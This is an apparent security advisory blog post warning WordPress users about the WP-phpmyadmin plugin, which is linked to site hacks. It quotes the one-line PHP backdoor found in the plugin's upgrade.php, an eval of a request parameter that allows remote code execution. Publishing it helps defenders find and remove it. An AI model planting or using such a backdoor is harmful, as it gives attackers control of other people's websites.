If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.
On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:
<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>
This is not part of the plugin, and should be removed immediately!
The code snippet above is a backdoor and allows remote access to the affected sites with it installed.
We also noticed that it was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is not longer being updated, you shouldn’t be using it anymore.
EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:
The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.
So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.
If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.
If you are not sure if your site got hacked, you can scan it here: http://sitecheck.sucuri.net.
Leave a reply